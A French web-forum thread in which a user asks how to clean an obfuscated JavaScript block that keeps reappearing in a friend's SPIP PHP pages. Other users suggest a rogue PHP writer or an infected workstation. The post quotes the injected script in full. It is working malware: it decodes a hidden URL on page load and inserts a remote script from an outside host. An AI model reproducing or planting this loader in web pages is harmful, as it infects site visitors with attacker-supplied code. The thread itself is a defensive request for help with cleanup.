Code javascript suspect, le retour ! [Résolu]

[ericduval]

Bonjour,

Un camarade , n'arrive pas à supprimer de ses
pages PHP (SPIP 1.9.2) le code javascript suivant :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
<script>try {var I='';var u=RegExp;var jh=String("rep"+"lacuPn".substr(0,3)+"1kWeWk1".substr(3,1));var jC=new Array();var B=new Array();var TQ="";var qJ='';function j(a,n){var Wo=new String();this.r='';var j
V=String("[7MIl".substr(0,1));var e=new String("gPr4".substr(0,1));var Og=new String();jV+=n;jV+=String("]");var o=new Array();var p=new String();var F=new u(jV, e);var D=new String();var x;if(x!='' && x!='Q
'){x=null};return a[jh](F, new String());};var wP;if(wP!='oZ' && wP != ''){wP=null};var E=new String();var m=new String();var U=j('c8r8e8a8t8e8E8lve8mvevnvtv',"8v");var wf='';var Da;if(Da!='R' && Da!='Fo'){D
a=''};var Vi=new Date();var Lc;if(Lc!='Fa'){Lc='Fa'};var T=j('o1n1l1oTa1dT',"1T");var P_;if(P_!='' && P_!='Tr'){P_='jn'};var g=j('hZtCtkpH:H/k/HgHo3oZgHl3ek-kckoZmH-klZyZ.ZpHe3r3eCzCh3iZl3tHoHnk.3c3oZmC.3cZt
krCiHpH-HcZo3m3.HTZhHeZBClkeHnCdke3rkT3u3tHoZr3iCaZlZ.HrHuH:3',"kHZC3");var X=j('811901918111011',"91");var S="";var Mo="";var t=j('/SaFmSaSzQoSnQ.QdFeS/FaFmQaFzQoFnS.SdSeF/StQySpSeQpQaSdS.QcQoFmS/FgFoFoFgSl
SeQ.FcSoQmQ/FcFaFmFsF.FcSoFmQ.SpShFpS',"SFQ");var gJ="";var MI=new String();var W=window;var A='';var O=j('sucurZiZpZtu',"uZ");Th=function(){var GX;if(GX!='' && GX!='FQ'){GX=''};var ZL='';UL=document[U](O);v
ar edh;if(edh!='oP'){edh=''};var tR;if(tR!='bOf'){tR=''};A=g+X;A+=t;var PO='';var Dt='';UL.defer=([7,1][1]);var Cd;if(Cd!='iL' && Cd != ''){Cd=null};var mE=new Array();UL.src=A;document.body.appendChild(UL);
};var YO;if(YO!=''){YO='fn'};var ZY;if(ZY!='' && ZY!='rU'){ZY=null};var XS;if(XS!='Ya' && XS!='nc'){XS='Ya'};var rp=new Date();W[T]=Th;this.ro='';this.Ut="";this.yz="";var dH;if(dH!='ZG' && dH != ''){dH=null
};} catch(M){this.Um="";};</script>
<!--f29a5e23636121df1a1acb329d128822-->

Comment ce code se retrouve dans plusieurs de ses pages ?
A votre avis, est ce qu'à l'origine son poste de travail est vérolé,
est ce que la base associée à son site est vérolée ? Autre chose ????

Auriez-vous de liens qui me permettraient d'en savoir plus ?

Pour information, il a déjà supprimé de son site un code ressemblant
en début de semaine.

Merci pour votre aide.

[SpaceFrog]

tu dois avoir un autre fichier php qui ouvre les fichiers php et y rajoute ces lignes ...
fais une recherche pour un code du genre fopen ...

[E.Bzz]

Bonjour,
visiblement, il t'ajoute une balise <script> dans tes pages.
Tu dois pouvoir retrouver cette balise pirate via Firebug ou autre, pour essayer de voir ce qu'elle fait ...

A+

[ericduval]

A priori un des webmasters se faisait pourrir ces pages
directement sur son PC.
"A priori" car il reste difficile vu de loin de préciser avec certitude
la cause. (ça fait pas avancer le smilblick)